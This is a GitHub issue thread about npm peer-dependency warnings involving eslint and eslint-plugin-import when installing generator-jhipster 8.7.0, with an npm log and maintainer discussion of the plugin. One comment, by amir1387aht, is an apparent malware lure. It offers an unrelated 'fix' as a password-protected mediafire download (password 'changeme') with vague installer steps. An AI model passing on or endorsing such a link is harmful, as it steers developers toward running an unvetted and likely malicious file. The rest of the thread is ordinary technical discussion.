### ISSUE TITLE
Installing JHipster 8.7.0 has warnings about eslint

### ISSUE THREAD

**Issue by mraible** [jhipster/generator-jhipster#27091]
##### **Overview of the issue**

```
npm warn ERESOLVE overriding peer dependency
npm warn While resolving: eslint-plugin-import@2.29.1
npm warn Found: eslint@9.9.1
npm warn node_modules/generator-jhipster/node_modules/eslint
npm warn   eslint@"9.9.1" from generator-jhipster@8.7.0
npm warn   node_modules/generator-jhipster
npm warn     generator-jhipster@"*" from the root project
npm warn   2 more (eslint-plugin-unused-imports, @eslint-community/eslint-utils)
npm warn
npm warn Could not resolve dependency:
npm warn peer eslint@"^2 || ^3 || ^4 || ^5 || ^6 || ^7.2.0 || ^8" from eslint-plugin-import@2.29.1
npm warn node_modules/generator-jhipster/node_modules/eslint-plugin-import
npm warn   eslint-plugin-import@"2.29.1" from generator-jhipster@8.7.0
npm warn   node_modules/generator-jhipster
npm warn
npm warn Conflicting peer dependency: eslint@8.57.0
npm warn node_modules/eslint
npm warn   peer eslint@"^2 || ^3 || ^4 || ^5 || ^6 || ^7.2.0 || ^8" from eslint-plugin-import@2.29.1
npm warn   node_modules/generator-jhipster/node_modules/eslint-plugin-import
npm warn     eslint-plugin-import@"2.29.1" from generator-jhipster@8.7.0
npm warn     node_modules/generator-jhipster

added 705 packages in 5s

229 packages are looking for funding
  run `npm fund` for details
```

##### **Motivation for or Use Case**

There shouldn't be warnings when installing JHipster. 

##### **Reproduce the error**

```
npm i -g generator-jhipster
```

##### **Related issues**

#26914

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mraible** [comment]
Added bug bounty to get this fixed.

**Comment by mshima** [comment]
> The errors (except `order`) are handled by TypeScript directly and the rest is either not really applicable in TypeScript or not that useful. VSCode has a code suggestion similar to `no-duplicates` and `order` and alternatively this prettier plugin could be used: https://www.npmjs.com/package/prettier-plugin-organize-imports
> 
> I suggest to just remove `eslint-plugin-import`.

`eslint-plugin-import` is not added to typescript projects only.
It's added to add a common config to blueprints at `generator-jhipster/eslint/recommended`.

**Comment by emilpaw** [comment]
@mshima Thanks for clarifying. After the fix is merged I will close my PR and create a new PR with the fixes I made to the issues which surfaced after changing the configuration.
